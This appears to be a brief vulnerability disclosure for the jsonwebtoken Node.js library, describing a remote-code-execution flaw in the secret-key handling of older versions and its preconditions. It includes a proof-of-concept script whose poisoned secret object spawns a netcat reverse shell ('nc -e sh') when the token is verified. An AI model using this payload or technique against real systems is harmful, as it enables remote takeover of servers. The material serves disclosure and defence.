The JSON Web Token (JWT) library versions prior to 3.4.6, 4.0.4, and 4.1.5 are vulnerable to RCE.
The HMAC hashing functions take any string as input which leads to RCE.
Due to the preconditions, this vulnerability is not likly to be exploitable.
In order to exploit this vulnerability an attacker would need one of the following conditions to be true:
- The server does not store secret keys securely.
- The attacker needs to have access to and control the secret keys.
var jwt = require('jsonwebtoken');
var token = jwt.sign({"x":"y"}, 'servers_secret');
var poisoned_secret_on_server = {
toString : ()=> {console.log('PWNED AFTER PASRSING TOKEN');
process.on('exit', ()=> {
require('child_process').exec('nc -e sh 127.0.0.1 9001');
});
process.exit(0)
}
}
jwt.verify(token, poisoned_secret_on_server);